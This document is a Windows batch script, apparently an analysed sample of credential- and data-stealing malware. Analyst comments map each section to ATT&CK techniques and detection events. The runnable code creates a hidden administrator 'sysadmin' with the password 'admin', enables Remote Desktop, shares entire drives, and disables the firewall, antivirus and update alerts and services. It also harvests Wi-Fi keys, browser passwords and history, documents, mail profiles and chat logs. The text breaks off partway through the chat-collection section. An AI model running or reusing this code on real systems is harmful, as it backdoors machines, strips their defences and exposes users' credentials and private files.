- rem Analyst note: Windows batch collection script. Every section below appends to a per-host,
- rem per-user text log under ..\.\Documents, a path relative to the current directory.
- rem NOTE(review): "echo. off" is not the usual "@echo off"; confirm whether command echo is really suppressed.
- echo. off
- rem Kill switch: if c:\killswitch.txt exists, control jumps to :end and none of the sections below run.
- if exist c:\killswitch.txt goto end
- if not exist ..\.\Documents\%computername% mkdir ..\.\Documents\%computername% >nul
- rem infolog is not referenced again in the visible script.
- rem NOTE(review): the unescaped redirection operator is presumably parsed as a redirection rather than stored in the variable - confirm.
- set infolog=>> ..\.\Documents\%computername%\%username%.txt
- :Sinfo
- rem Host discovery section (ATT&CK T1082, T1016, T1057, T1069.001). Skipped when the marker file sinfodis.set exists.
- rem Detection: one cmd.exe parent launching net.exe, ipconfig.exe and tasklist.exe back to back,
- rem all appending to the same text file (process-creation logging, e.g. Security event 4688).
- rem Bare "echo" lines write the ECHO on/off status text into the log and act as separators.
- if exist "..\system\Settings\sinfodis.set" goto :SRemoteinfo
- echo ---------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
- echo -----System Info--- >> ..\.\Documents\%computername%\%username%.txt
- echo ---------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
- echo off
- echo Computer Name is: %computername% >> ..\.\Documents\%computername%\%username%.txt
- echo User Name: %username% >> ..\.\Documents\%computername%\%username%.txt
- echo The date and Time is: %date% %time% >> ..\.\Documents\%computername%\%username%.txt
- echo >> ..\.\Documents\%computername%\%username%.txt
- echo [+]name of the domain controller that validated the current logon session. >> ..\.\Documents\%computername%\%username%.txt
- echo %logonserver% >> ..\.\Documents\%computername%\%username%.txt
- echo >> ..\.\Documents\%computername%\%username%.txt
- rem The "route pring" and "getmac" lines below only echo those words; no command output is captured for them.
- echo [+]IP Routing tables and Gateway >> ..\.\Documents\%computername%\%username%.txt
- echo route pring >> ..\.\Documents\%computername%\%username%.txt
- echo >> ..\.\Documents\%computername%\%username%.txt
- echo [+] MAC Address >> ..\.\Documents\%computername%\%username%.txt
- echo getmac >> ..\.\Documents\%computername%\%username%.txt
- echo >> ..\.\Documents\%computername%\%username%.txt
- echo [+] Operating System type. >> ..\.\Documents\%computername%\%username%.txt
- echo %OS% >> ..\.\Documents\%computername%\%username%.txt
- echo >> ..\.\Documents\%computername%\%username%.txt
- echo [+]Number of Processors Installed. >> ..\.\Documents\%computername%\%username%.txt
- echo %NUMBER_OF_PROCESSORS% >> ..\.\Documents\%computername%\%username%.txt
- echo >> ..\.\Documents\%computername%\%username%.txt
- rem Enumerates members of the local Administrators group.
- echo [+] List of Administrators >> ..\.\Documents\%computername%\%username%.txt
- net localgroup administrators >> ..\.\Documents\%computername%\%username%.txt
- echo off
- echo >> ..\.\Documents\%computername%\%username%.txt
- echo [+] Network adapters >> ..\.\Documents\%computername%\%username%.txt
- ipconfig /all >> ..\.\Documents\%computername%\%username%.txt
- echo >> ..\.\Documents\%computername%\%username%.txt
- echo [+] Task List >> ..\.\Documents\%computername%\%username%.txt
- tasklist >> ..\.\Documents\%computername%\%username%.txt
- echo >> ..\.\Documents\%computername%\%username%.txt
- :SRemoteInfo
- rem Network and account discovery section (ATT&CK T1018, T1087, T1069, T1135). Skipped when SremoteInfodis.set exists.
- rem Runs arp, several net subcommands and nbtstat, appending all output to the per-host log.
- rem When reading a recovered log, note that the headings are the author's labels: "Current Connected Users"
- rem is the output of net use and "Current Machines Connected" is the output of nbtstat -n.
- if exist "..\system\Settings\SremoteInfodis.set" goto :Suser
- echo ---------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
- echo ----Remote info---- >> ..\.\Documents\%computername%\%username%.txt
- echo ---------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
- echo off
- echo [+] Arp Information >> ..\.\Documents\%computername%\%username%.txt
- arp -a >> ..\.\Documents\%computername%\%username%.txt
- echo >> ..\.\Documents\%computername%\%username%.txt
- echo [+] Listed Domain Users >> ..\.\Documents\%computername%\%username%.txt
- net group >> ..\.\Documents\%computername%\%username%.txt
- echo >> ..\.\Documents\%computername%\%username%.txt
- echo [+] Listed Local shares >> ..\.\Documents\%computername%\%username%.txt
- net share >> ..\.\Documents\%computername%\%username%.txt
- echo >> ..\.\Documents\%computername%\%username%.txt
- echo [+] List of Users >> ..\.\Documents\%computername%\%username%.txt
- net user >> ..\.\Documents\%computername%\%username%.txt
- echo >> ..\.\Documents\%computername%\%username%.txt
- echo [+] Current Connected Users >> ..\.\Documents\%computername%\%username%.txt
- net use >> ..\.\Documents\%computername%\%username%.txt
- echo >> ..\.\Documents\%computername%\%username%.txt
- echo [+] Listed Current Shares with ID Tags >> ..\.\Documents\%computername%\%username%.txt
- net view >> ..\.\Documents\%computername%\%username%.txt
- echo >> ..\.\Documents\%computername%\%username%.txt
- echo [+] Current Machines Connected >> ..\.\Documents\%computername%\%username%.txt
- nbtstat -n >> ..\.\Documents\%computername%\%username%.txt
- :Suser
- rem Rogue local administrator (ATT&CK T1136.001, T1098). Skipped when suserdis.set exists.
- rem Creates the local account "sysadmin" with the password "admin", adds it to Administrators,
- rem and writes both credentials in clear text to the log.
- rem Detection: Security events 4720 (account created) and 4732 (member added to local group);
- rem an unexpected local account named sysadmin in Administrators should be treated as an indicator of compromise.
- if exist "..\system\Settings\suserdis.set" goto :Huser
- echo -------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
- echo -----Created System User----- >> ..\.\Documents\%computername%\%username%.txt
- echo -------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
- net user sysadmin admin /add /y >> ..\.\Documents\%computername%\%username%.txt
- net localgroup Administrators sysadmin /add /y >> ..\.\Documents\%computername%\%username%.txt
- rem The two echo lines run regardless of whether the net commands succeeded.
- echo Username: sysadmin >> ..\.\Documents\%computername%\%username%.txt
- echo Password: admin >> ..\.\Documents\%computername%\%username%.txt
- :Huser
- rem Hidden-user section (ATT&CK T1564.002). Skipped when huserdis.set exists.
- rem Sets a DWORD value named sysadmin to 0 under Winlogon SpecialAccounts UserList, the key that controls
- rem which accounts appear on the welcome screen.
- rem Detection: audit writes under Winlogon\SpecialAccounts\UserList; legitimate software rarely touches it.
- rem NOTE(review): the trailing /y is not a switch this reviewer recognises for reg add, so the write may fail;
- rem absence of the value does not prove the script did not run. "Done." is logged either way.
- if exist "..\system\Settings\huserdis.set" goto :RDP
- echo -------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
- echo -----UserName Hidden From Welcome Screen----- >> ..\.\Documents\%computername%\%username%.txt
- echo -------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
- reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v sysadmin /t REG_DWORD /d 0 /f /y >> ..\.\Documents\%computername%\%username%.txt
- echo Done. >> ..\.\Documents\%computername%\%username%.txt
- :RDP
- rem Remote access section (ATT&CK T1112, enabling T1021.001). Skipped when RDPdis.set exists.
- rem Sets fDenyTSConnections to 0 under the Terminal Server control key, which allows inbound Remote Desktop.
- rem Detection: registry auditing on fDenyTSConnections; correlate with new local admin accounts and firewall changes.
- rem "Done." is logged whether or not the registry write succeeded.
- if exist "..\system\Settings\RDPdis.set" goto :shares
- echo -------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
- echo -----Enabled Remote Desktop----- >> ..\.\Documents\%computername%\%username%.txt
- echo -------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
- reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0 >> ..\.\Documents\%computername%\%username%.txt
- echo Done. >> ..\.\Documents\%computername%\%username%.txt
- :shares
- rem Share creation section. Skipped when sharesdis.set exists.
- rem Publishes the roots of drives C, D and E as network shares named C, D and E.
- rem Detection: Security event 5142 (network share added) and net.exe share command lines that map a whole drive.
- rem The three "Created" lines are echoed unconditionally, so the log does not prove a share exists; verify with net share.
- if exist "..\system\Settings\sharesdis.set" goto :registry
- echo -------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
- echo -----Created System Shares----- >> ..\.\Documents\%computername%\%username%.txt
- echo -------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
- net share C=C: >> ..\.\Documents\%computername%\%username%.txt
- net share D=D: >> ..\.\Documents\%computername%\%username%.txt
- net share E=E: >> ..\.\Documents\%computername%\%username%.txt
- echo C: Created >> ..\.\Documents\%computername%\%username%.txt
- echo D: Created >> ..\.\Documents\%computername%\%username%.txt
- echo E: Created >> ..\.\Documents\%computername%\%username%.txt
- :Registry
- rem Defense-impairment section via registry (ATT&CK T1562.004, T1562.001, T1112). Skipped when registrydis.set exists.
- rem Sets EnableFirewall to 0 and DisableNotifications to 1 for the firewall StandardProfile, and sets the
- rem Security Center values that suppress antivirus, firewall and update alerts.
- rem Triage note: the firewall values are written under ControlSet001, so check that path explicitly.
- rem The reg add output is not redirected to the log; only the summary echo lines at the end are.
- if exist "..\system\Settings\registrydis.set" goto :sysprotect
- echo -------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
- echo -----Registry Tweaks----- >> ..\.\Documents\%computername%\%username%.txt
- echo ---------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
- reg add "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile" /v EnableFirewall /t REG_DWORD /d 00000000 /f
- reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center" /v AntiVirusDisableNotify /t REG_DWORD /d 00000001 /f
- reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center" /v FirewallDisableNotify /t REG_DWORD /d 00000001 /f
- reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center" /v UpdatesDisableNotify /t REG_DWORD /d 00000001 /f
- reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center" /v FirewallOverride /t REG_DWORD /d 00000001 /f
- reg add "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile" /v DisableNotifications /t REG_DWORD /d 00000001 /f
- echo +Disabled MS Updates Notifications >> ..\.\Documents\%computername%\%username%.txt
- echo +Disabled MS AntiVirus Notifications >> ..\.\Documents\%computername%\%username%.txt
- echo +Disabled MS Firewall Notifications >> ..\.\Documents\%computername%\%username%.txt
- echo +Disabled MS Firewall >> ..\.\Documents\%computername%\%username%.txt
- :Sysprotect
- rem Defense-impairment section via services (ATT&CK T1562.001, T1562.004). Skipped when sysprotectdis.set exists.
- rem Stops update, firewall and Security Center services by display name, disables the firewall with netsh,
- rem and sets the wscsvc service start type to disabled.
- rem Detection: Service Control Manager events 7036 and 7040 in the System log, and process-creation
- rem records for net.exe stop, netsh.exe firewall and sc.exe config launched from a script.
- rem The summary lines are echoed unconditionally. They list "MS Defender" although no visible command
- rem names a Defender service, so treat the log text as the author's label, not as evidence.
- if exist "..\system\Settings\sysprotectdis.set" goto :wifikey
- echo -------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
- echo -----System Protection Disabled----- >> ..\.\Documents\%computername%\%username%.txt
- echo -------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
- net stop "Automatic Updates" /y
- net stop "DefWatch" /y
- net stop "Microsoft Firewall" /y
- net stop "Windows Firewall/Internet Connection Sharing (ICS)" /y
- net stop "security center" /y
- netsh firewall set opmode disable
- sc config wscsvc start= disabled
- echo Disabled Services >> ..\.\Documents\%computername%\%username%.txt
- echo + MS Defender >> ..\.\Documents\%computername%\%username%.txt
- echo + Ms Firewall >> ..\.\Documents\%computername%\%username%.txt
- echo + Ms Security Center >> ..\.\Documents\%computername%\%username%.txt
- echo + MS Update >> ..\.\Documents\%computername%\%username%.txt
- :WiFiKey
- rem Wireless profile collection section. Skipped when Wifikeydis.set exists.
- rem Exports the WZCSVC interface parameters from the registry and copies the Wlansvc profile folder
- rem into a WifiKey folder under the per-host output directory.
- rem Detection: reg.exe export of the WZCSVC key and xcopy.exe reading the Wlansvc Profiles folder under ProgramData.
- rem Response: wireless keys on an affected host should be considered exposed and rotated.
- if exist "..\system\Settings\Wifikeydis.set" goto :ieurl
- echo -------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
- echo -----Export Wireless Key----- >> ..\.\Documents\%computername%\%username%.txt
- echo -------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
- if not exist "..\.\Documents\%computername%\WifiKey" mkdir "..\.\documents\%computername%\WifiKey"
- rem NOTE(review): lines starting with a semicolon look intended as comments, but cmd.exe may treat a leading
- rem semicolon as a delimiter and still try to run the rest - confirm in a sandbox before assuming they are inert.
- ;XP
- reg export HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WZCSVC\Parameters\Interfaces ..\.\documents\%computername%\wifikey\wifi.reg
- ;Vista/win7
- xcopy %programdata%\Microsoft\Wlansvc\Profiles\Interfaces ..\.\documents\%computername%\wifikey\ /E
- echo These Keys will be encrypted, use wifi program to decrypt once you have import to right areas >> ..\.\Documents\%computername%\%username%.txt
- ; .\Tools\wkv.exe /stext "%computername%_wk.log" >> ..\.\Documents\%computername%\%username%.txt
- ; copy %computername%.html+%computername%_wk.log* >> ..\.\Documents\%computername%\%username%.txt
- ; del /f /q "%computername%_wk.log" >nul
- :IEurl
- rem Browsing-history section (ATT&CK T1217). Skipped when ieurldis.set exists.
- rem Dumps the current user's Internet Explorer TypedURLs registry key into the log. Read-only on the host.
- rem Detection: reg.exe query of the TypedURLs key launched from a script, with output redirected to a file.
- if exist "..\system\Settings\ieurldis.set" goto :iepw
- echo -------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
- echo -----Registery Dump on IE Typed URLs----- >> ..\.\Documents\%computername%\%username%.txt
- echo -------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
- reg query "HKCU\Software\Microsoft\Internet Explorer\TypedURLs" >> ..\.\Documents\%computername%\%username%.txt
- :IEpw
- rem Stored-credential section (ATT&CK T1555.003). Skipped when iepwdis.set exists.
- rem Dumps the current user's Internet Explorer IntelliForms registry key into the log. Read-only on the host.
- rem Response: passwords saved in Internet Explorer for this profile should be treated as exposed and changed.
- if exist "..\system\Settings\iepwdis.set" goto :startup
- echo -------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
- echo -----Registery Dump on IE Crypted Passwords----- >> ..\.\Documents\%computername%\%username%.txt
- echo -------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
- reg query "HKCU\Software\Microsoft\Internet Explorer\IntelliForms" >> ..\.\Documents\%computername%\%username%.txt
- echo Note: Create a reg Key With values and import to local machine then use software. >> ..\.\Documents\%computername%\%username%.txt
- :StartUp
- rem Autorun discovery section. Skipped when startupdis.set exists.
- rem Reads the current user's Run and Runonce keys into the log; nothing is written to the registry here.
- if exist "..\system\Settings\startupdis.set" goto :recent
- echo -------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
- echo -----Registery Dump on Startups----- >> ..\.\Documents\%computername%\%username%.txt
- echo -------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
- reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run >> ..\.\Documents\%computername%\%username%.txt
- reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Runonce >> ..\.\Documents\%computername%\%username%.txt
- :Recent
- rem Recent-files collection section (ATT&CK T1005). Skipped when recentdis.set exists.
- rem Copies the contents of the Recent folder in the user profile into a "Recently Opened" folder
- rem under the per-host output directory.
- rem "Copied." is logged whether or not the copy succeeded; the author notes it does not work on Windows 7.
- if exist "..\system\Settings\recentdis.set" goto :text
- echo -------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
- echo -----Dump Recently Opened Files----- >> ..\.\Documents\%computername%\%username%.txt
- echo ---------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
- mkdir "..\.\Documents\%Computername%\Recently Opened"
- copy "%USERPROFILE%\Recent" "..\.\Documents\%Computername%\Recently Opened" /y
- echo Copied. >> ..\.\Documents\%computername%\%username%.txt
- echo Will not work on Win7. >> ..\.\Documents\%computername%\%username%.txt
- :Text
- rem Document collection section (ATT&CK T1005, T1119).
- rem Copies office, text, database and log files by extension from My Documents and Desktop into a
- rem Files folder under the per-host output directory. Subfolders are not included (no /s switch).
- rem The gate below tests indexdis.set, the same marker the :index section uses, and jumps to :index.
- rem Detection: a burst of xcopy.exe processes with document-extension wildcards against one user profile,
- rem writing to a different volume; removable-media write auditing or DLP rules cover the same behaviour.
- if exist "..\system\Settings\indexdis.set" goto :index
- echo -------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
- echo -----Dump Text Documents----- >> ..\.\Documents\%computername%\%username%.txt
- echo ---------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
- MkDir ..\.\Documents\%computername%\Files
- rem Files holds the destination plus the xcopy switches; doc and desk hold the opening half of an
- rem "If not Exist" statement that is completed by the lines at the end of this section.
- rem doc is not used anywhere in the visible script.
- set Files="..\.\Documents\%computername%\Files\" /c /q /r /h /y /i
- set doc=If not Exist "%USERPROFILE%\My Documents\
- set desk=If not Exist "%USERPROFILE%\Desktop\
- xcopy "%USERPROFILE%\My Documents\*.txt" %files%
- xcopy "%USERPROFILE%\My Documents\*.doc" %files%
- xcopy "%USERPROFILE%\My Documents\*.wpd" %files%
- xcopy "%USERPROFILE%\My Documents\*.rtf" %files%
- xcopy "%USERPROFILE%\My Documents\*.xls" %files%
- xcopy "%USERPROFILE%\My Documents\*.docx" %files%
- xcopy "%USERPROFILE%\My Documents\*.ppt" %files%
- xcopy "%USERPROFILE%\My Documents\*.pptx" %files%
- xcopy "%USERPROFILE%\My Documents\*.mdb" %files%
- xcopy "%USERPROFILE%\My Documents\*.csv" %files%
- xcopy "%USERPROFILE%\My Documents\*.log" %files%
- xcopy "%USERPROFILE%\Desktop\*.txt" %files%
- xcopy "%USERPROFILE%\Desktop\*.doc" %files%
- xcopy "%USERPROFILE%\Desktop\*.wpd" %files%
- xcopy "%USERPROFILE%\Desktop\*.rtf" %files%
- xcopy "%USERPROFILE%\Desktop\*.xls" %files%
- xcopy "%USERPROFILE%\Desktop\*.docx" %files%
- xcopy "%USERPROFILE%\Desktop\*.ppt" %files%
- xcopy "%USERPROFILE%\Desktop\*.pptx" %files%
- xcopy "%USERPROFILE%\Desktop\*.mdb" %files%
- xcopy "%USERPROFILE%\Desktop\*.csv" %files%
- rem The Found / Not Found lines below test the Desktop only, so they say nothing about My Documents.
- %desk%*.txt" (echo Text Files Not Found. >> ..\.\Documents\%computername%\%username%.txt) ELSE (echo Text Files Found. >> ..\.\Documents\%computername%\%username%.txt)
- %desk%*.doc" (echo Document Files Not Found. >> ..\.\Documents\%computername%\%username%.txt) ELSE (echo Document Files Found. >> ..\.\Documents\%computername%\%username%.txt)
- %desk%*.wpd" (echo WordPad Files Not Found. >> ..\.\Documents\%computername%\%username%.txt) ELSE (echo WordPad Files Found. >> ..\.\Documents\%computername%\%username%.txt)
- %desk%*.rtf" (echo Rich Text File Not Found. >> ..\.\Documents\%computername%\%username%.txt) ELSE (echo Rich Text File Found. >> ..\.\Documents\%computername%\%username%.txt)
- %desk%*.xls" (echo Microsoft Excel Files Not Found. >> ..\.\Documents\%computername%\%username%.txt) ELSE (echo Microsoft Excel Files Found. >> ..\.\Documents\%computername%\%username%.txt)
- %desk%*.docx" (echo Document Files Not Found. >> ..\.\Documents\%computername%\%username%.txt) ELSE (echo Document Files Found. >> ..\.\Documents\%computername%\%username%.txt)
- %desk%*.ppt" (echo Microsoft PowerPoint Files Not Found. >> ..\.\Documents\%computername%\%username%.txt) ELSE (echo Microsoft PowerPoint Files Found. >> ..\.\Documents\%computername%\%username%.txt)
- %desk%*.pptx" (echo Microsoft PowerPoint Files Not Found. >> ..\.\Documents\%computername%\%username%.txt) ELSE (echo Microsoft PowerPoint Files Found. >> ..\.\Documents\%computername%\%username%.txt)
- %desk%*.mdb" (echo Microsoft Access Files Not Found. >> ..\.\Documents\%computername%\%username%.txt) ELSE (echo Microsoft Access Files Found. >> ..\.\Documents\%computername%\%username%.txt)
- %desk%*.csv" (echo comma-separated value Files Not Found. >> ..\.\Documents\%computername%\%username%.txt) ELSE (echo comma-separated value Files Found. >> ..\.\Documents\%computername%\%username%.txt)
- %desk%*.log" (echo Log Files Not Found. >> ..\.\Documents\%computername%\%username%.txt) ELSE (echo Log Files Found. >> ..\.\Documents\%computername%\%username%.txt)
- :index
- rem Internet Explorer index.dat collection section (ATT&CK T1005, T1217). Skipped when indexdis.set exists.
- rem For each known cookie, history, cache and UserData location, clears the read-only, archive, system and
- rem hidden attributes on index.dat and then copies the file to the output directory.
- rem Forensic note: the attrib calls modify attributes on the original files, so changed attributes on
- rem index.dat are themselves an artefact of this section having run.
- rem NOTE(review): the Vista and Windows 7 destinations use a variable named computer, which the visible
- rem script never sets, while every other section uses computername; expect these copies to land in a
- rem different folder from the rest of the output, or to fail. Several lines also have unbalanced quotes.
- if exist "..\system\Settings\indexdis.set" goto :iefavs
- if not exist "..\.\Documents\%computer%\IEindex" mkdir "..\.\Documents\%computer%"
- echo -------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
- echo -----Dump IE History index.dat File----- >> ..\.\Documents\%computername%\%username%.txt
- echo -------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
- ;Win7/Vista
- attrib -r -a -s -h "%userprofile%\appdata\\Roaming\Microsoft\Windows\Cookies\index.dat"
- copy /Y "%userprofile%\appdata\Roaming\Microsoft\Windows\Cookies\index.dat" "..\.\Documents\%computer%\IEindex\index1.dat'
- attrib -a -r -s -h "%userprofile%\appdata\\Roaming\Microsoft\Windows\Cookies\Low\index.dat"
- copy /Y "%userprofile%\appdata\Roaming\Microsoft\Windows\Cookies\Low\index.dat" "..\.\Documents\%computer%\IEindex\index2.dat"
- attrib -r -a -s -h "%userprofile%\appdata\\Local\Microsoft\Windows\History\History.IE5\index.dat"
- copy /Y "%userprofile%\appdata\Local\Microsoft\Windows\History\History.IE5\index.dat" "..\.\Documents\%computer%\IEindex\index3.dat"
- attrib -r -a -s -h "%userprofile%\appdata\\Local\Microsoft\Windows\History\History.IE5\Low\index.dat"
- copy /Y "%userprofile%\appdata\Local\Microsoft\Windows\History\History.IE5\Low\index.dat" "..\.\Documents\%computer%\IEindex\index4.dat"
- attrib -r -a -s -h "%userprofile%\appdata\\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\index.dat"
- copy /Y "%userprofile%\appdata\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\index.dat" "..\.\Documents\%computer%\IEindex\index7.dat"
- attrib -r -a -s -h "%userprofile%\appdata\\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\index.dat"
- copy /Y "%userprofile%\appdata\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\index.dat" "..\.\Documents\%computer%\IEindex\index8.dat"
- attrib -r -a -s -h "%userprofile%\appdata\\Roaming\Microsoft\Internet Explorer\UserData\index.dat"
- copy /Y "%userprofile%\appdata\Roaming\Microsoft\Internet Explorer\UserData\index.dat" "..\.\Documents\%computer%\IEindex\index9.dat"
- attrib -r -a -s -h "%userprofile%\appdata\\Roaming\Microsoft\Internet Explorer\UserData\Low\index.dat"
- copy /Y "%userprofile%\appdata\Roaming\Microsoft\Internet Explorer\UserData\Low\index.dat" "..\.\Documents\%computer%\IEindex\index0.dat"
- rem The XP and 2000 copies below go to the per-host folder itself rather than to an IEindex subfolder.
- ;WinXP/2000
- attrib -r -a -s -h "%userprofile%\Cookies\index.dat"
- copy /Y "%userprofile%\Cookies\index.dat" "..\.\Documents\%computername%\index1.dat"
- attrib -r -a -s -h %userprofile%\Local Settings\History\History.IE5\index.dat"
- copy /Y "%userprofile%\Local Settings\History\History.IE5\index.dat" "..\.\Documents\%computername%\index2.dat"
- attrib -r -a -s -h %userprofile%\Local Settings\Temporary Internet Files\Content.IE5\index.dat"
- copy /Y "%userprofile%\Local Settings\Temporary Internet Files\Content.IE5\index.dat" "..\.\Documents\%computername%\index4.dat"
- attrib -r -a -s -h "%userprofile%\UserData\index.dat"
- copy /Y "%userprofile%\UserData\index.dat" "..\.\Documents\%computername%\index5.dat"
- :IEfavs
- rem Browser and mail-client data collection section (ATT&CK T1555.003, T1217, T1005). Skipped when iefavsdis.set exists.
- rem Despite the heading, this copies more than Internet Explorer favourites: Firefox profile files matching
- rem signons, db, txt and html patterns, Thunderbird profiles, Opera profile and mail files, and Netscape
- rem profile files, each into a subfolder of InternetBroswers under the per-host output directory.
- rem Response: saved browser and mail passwords for this profile should be treated as exposed and changed.
- rem Detection: xcopy.exe reading browser profile directories when the parent process is a script, not the browser.
- if exist "..\system\Settings\iefavsdis.set" goto :chat
- echo -------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
- echo -----Dump Internet Explorer Favorites----- >> ..\.\Documents\%computername%\%username%.txt
- echo -------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
- rem NOTE(review): interb is assigned with an opening quote and no closing quote, and is then wrapped in
- rem quotes again at each use; the resulting destination paths are unverified.
- set interb="..\.\Documents\%computername%\InternetBroswers
- if exist "%APPDATA%\Mozilla\Firefox\*" mkdir "%interb%\FireFox" && echo FireFox Found. >> ..\.\Documents\%computername%\%username%.txt
- if exist "%APPDATA%\Thunderbird\*" mkdir "%interb%\Thunderbird" && echo Thunderbird Found. >> ..\.\Documents\%computername%\%username%.txt
- if exist "%APPDATA%\netscape\NSB\*" mkdir "%interb%\netScape" && echo netScape Found. >> ..\.\Documents\%computername%\%username%.txt
- if exist "%APPDATA%\Opera\Opera\*" mkdir "%interb%\Opera" && echo Opera Found. >> ..\.\Documents\%computername%\%username%.txt
- if exist "%USERPROFILE%\Favorites\*" mkdir "%interb%\IExplorer\" && echo MS IE Found. >> ..\.\Documents\%computername%\%username%.txt
- rem The xcopy lines run whether or not the matching application was found above.
- xcopy "%USERPROFILE%\Favorites\*" "%interb%\IExplorer\" /s /c /q /r /h /y /i
- xcopy "%APPDATA%\netscape\NSB\Profiles\*.db" "%interb%\netScape\" /s /c /q /r /h /y /i
- xcopy "%APPDATA%\netscape\NSB\Profiles\*.dat" "%interb%\netScape\" /s /c /q /r /h /y /i
- xcopy "%APPDATA%\netscape\NSB\Profiles\*bookmarks.html" "%interb%\netScape\" /s /c /q /r /h /y /i
- xcopy "%APPDATA%\Opera\Opera\profile\*.dat" "%interb%\Opera\" /s /c /q /r /h /y /i
- xcopy "%APPDATA%\Opera\Opera\mail\*.dat" "%interb%\Opera\" /s /c /q /r /h /y /i
- xcopy "%APPDATA%\Opera\Opera\mail\*.ini" "%interb%\Opera\" /s /c /q /r /h /y /i
- xcopy "%APPDATA%\Mozilla\Firefox\Profiles\*signons*" "%interb%\FireFox\" /s /c /q /r /h /y /i
- xcopy "%APPDATA%\Mozilla\Firefox\Profiles\*default*.txt" "%interb%\FireFox\" /s /c /q /r /h /y /i
- xcopy "%APPDATA%\Mozilla\Firefox\Profiles\*.db" "%interb%\FireFox\" /s /c /q /r /h /y /i
- xcopy "%APPDATA%\Mozilla\Firefox\Profiles\*default*\*.db" "%interb%\FireFox\" /s /c /q /r /h /y /i
- xcopy "%APPDATA%\Mozilla\Firefox\Profiles\*.html" "%interb%\FireFox" /s /c /q /r /h /y /i
- xcopy "%APPDATA%\Thunderbird\Profiles\*" "%interb%\ThunderBird\*" /s /c /q /r /h /y /i
- :chat
- rem Instant-messaging data collection section (ATT&CK T1005). Skipped when chatdis.set exists.
- rem Checks for a dozen chat clients by folder, logs which were found, then copies their log and profile
- rem folders recursively into ChatLogs under the per-host output directory.
- rem The Skype, Miranda, Pidgin and ICQ copies take the whole application data folder, not only logs, so
- rem account configuration for those clients should be considered exposed as well as message history.
- rem The xcopy lines run whether or not the matching client was found above.
- if exist "..\system\Settings\chatdis.set" goto :QB
- echo -------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
- echo -----Dump Chat Logs----- >> ..\.\Documents\%computername%\%username%.txt
- echo ---------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
- set chatlog=..\.\Documents\%computername%\ChatLogs
- Mkdir %chatlog%
- if exist "%USERPROFILE%\My Documents\My Received Files\*" mkdir "%chatlog%\MSN" && echo MSN Found. >> ..\.\Documents\%computername%\%username%.txt
- if exist "%APPDATA%\Skype\*" mkdir "%chatlog%\Skype" && echo Skype Found. >> ..\.\Documents\%computername%\%username%.txt
- if exist "%programfiles%\Trillian\*" mkdir "%chatlog%\Trillian" && echo Trillian Found. >> ..\.\Documents\%computername%\%username%.txt
- if exist "%programfiles%\Yahoo!\Messenger\*" mkdir "%chatlog%\Yahoo*" && echo Yahoo Found. >> ..\.\Documents\%computername%\%username%.txt
- if exist "%programfiles%\Miranda\*" mkdir "%chatlog%\Miranda" && echo Miranda Found. >> ..\.\Documents\%computername%\%username%.txt
- if exist "%APPDATA%\gaim\*" mkdir "%chatlog%\gaim" && echo Gaim Found. >> ..\.\Documents\%computername%\%username%.txt
- if exist "%USERPROFILE%\My Documents\ICQ Lite\*" mkdir "%chatlog%\ICQ" && echo ICQ Found. >> ..\.\Documents\%computername%\%username%.txt
